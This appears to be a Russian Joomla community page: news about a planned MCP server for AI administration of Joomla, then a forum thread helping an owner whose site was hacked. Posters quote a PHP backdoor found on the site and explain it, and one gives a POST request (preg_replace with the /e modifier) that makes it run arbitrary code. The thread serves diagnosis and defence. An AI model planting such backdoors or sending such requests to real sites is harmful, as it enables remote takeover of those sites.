Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 40 Ответов
  • 3480 Просмотров
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Объясню на пальцах. У вас был получен доступ к файловой системе сервера, произведена запись кода вида
Код: php
error_reporting(0);
$_passssword = '.....................';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @.......

Этот код позволяет получить удаленный доступ к вашему сайту и выполнить произвольный код. Сейчас уже не имеют значение права, которые вы выставили, не имеет значение и то, что вы что то где то меняете. Если сами не понимаете, что делать, наймите специалиста. Вас взломали, и искать нужно не только следствие этого взлома, но и его причины. Пройдитесь сканером, как советовали, но опять же, что бы работать со сканером, нужно иметь хотя бы базовые знание PHP.

На пальцах это по другому)))

__________________________
$_passssword = '.....................'; - тут переменная которую ТС спрятал, пусть она условно будет "key"

$p = $_POST; преобразование пост массива в переменную

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); идет обработка входящих данных, к примеру замени на боли понятный вид:

Код
if (@$_POST['key'] AND @$_POST['a'] AND @$_POST['c'])  @$_POST['key'](@$_POST['a'], @$_POST['c'], '');
где @$_POST['key'](@$_POST['a'], @$_POST['c'], ''); очень начинает напоминать эвристику интересной переменной preg_replace($param1, $param2, $param3);

а теперь если подставить в пост переменные нужные данные а это
POST:key=preg_replace&a=/.*/e&c=phpinfo();

Что нам показывает возможность выполнения любого кода, тетрадки закрываем, урок 1 по бегдорам окончен, все на переменную!

*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
xcalendar.. когда они уже по другому будут называть его. Похоже кто-то распространяет Joomla с уже вставленным бекдором.
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
урок 1 по бегдорам окончен

Берегитесь некоторых минусовальшиков. Я как то просто название бекдора сказал...
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
На пальцах это по другому)))
Ну я не стал вдаваться в детали, написал в общих чертах. Наглядно и понятно. ТС важнее знать не принцип его работы, а возможности и как с этим бороться.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Берегитесь некоторых минусовальшиков. Я как то просто название бекдора сказал...
мне как то Taatshi мисанул, ему показалось, что я задел его достоинство)))
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
мне как то Taatshi мисанул, ему показалось, что я задел его достоинство)))
Taatshi - она, у неё дочка тебе в невесты просто по возрасту  ^-^ (может что и не так написал) всяко бывает  ;)
..., тетрадки закрываем, урок 1 по бегдорам окончен, все на переменную!
Домашнее задание проверять будешь?
Дневники готовить?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Taatshi - она ... может что и не так написал ...

Ну вот опять не так сказал, еще одного минуса жди ;D

Домашнее задание проверять будешь?
Дневники готовить?
Да, давай, проверю!
*

Dzen

  • Осваиваюсь на форуме
  • 33
  • 0 / 0
:)) тот случай когда видишь что человек отличный специалист, да такой, что боишься дать сайты, потому что ломанёт вообще всё :)))
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
:)) тот случай когда видишь что человек отличный специалист, да такой, что боишься дать сайты, потому что ломанёт вообще всё :)))
Правильно, давайте тем сайты, от которых не боитесь, что ломанут, они вам точно все защитят :))
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Правильно, давайте тем сайты, от которых не боитесь, что ломанут, они вам точно все защитят :))
Не сыпьте в наши огороды камни, а то самим с/х поднимать придется в одиночестве  ^-^
:)) тот случай когда видишь что человек отличный специалист, да такой, что боишься дать сайты, потому что ломанёт вообще всё :)))
На самом деле мягкий плюшевый и пушистый.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
а то самим с/х поднимать придется в одиночестве  ^-^На самом деле мягкий плюшевый и пушистый.
Долго думал... о чем это вы, вроде доперло :laugh:
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 5520
Последний ответ 28.08.2020, 22:00:30
от cntrl
Вредоносный код в url после якоря #

Автор dm-krv

Ответов: 7
Просмотров: 2121
Последний ответ 10.07.2018, 14:12:29
от dm-krv
Открытие несуществующих страниц после лечения от вирусов

Автор DimentR

Ответов: 9
Просмотров: 1725
Последний ответ 07.02.2018, 18:04:23
от surho
БД после взлома

Автор cntrl

Ответов: 11
Просмотров: 1535
Последний ответ 09.01.2018, 17:06:17
от Aleks.Denezh
Не выводятся материалы ZOO. После вируса

Автор nuclearacid

Ответов: 1
Просмотров: 1278
Последний ответ 29.05.2017, 21:48:36
от robert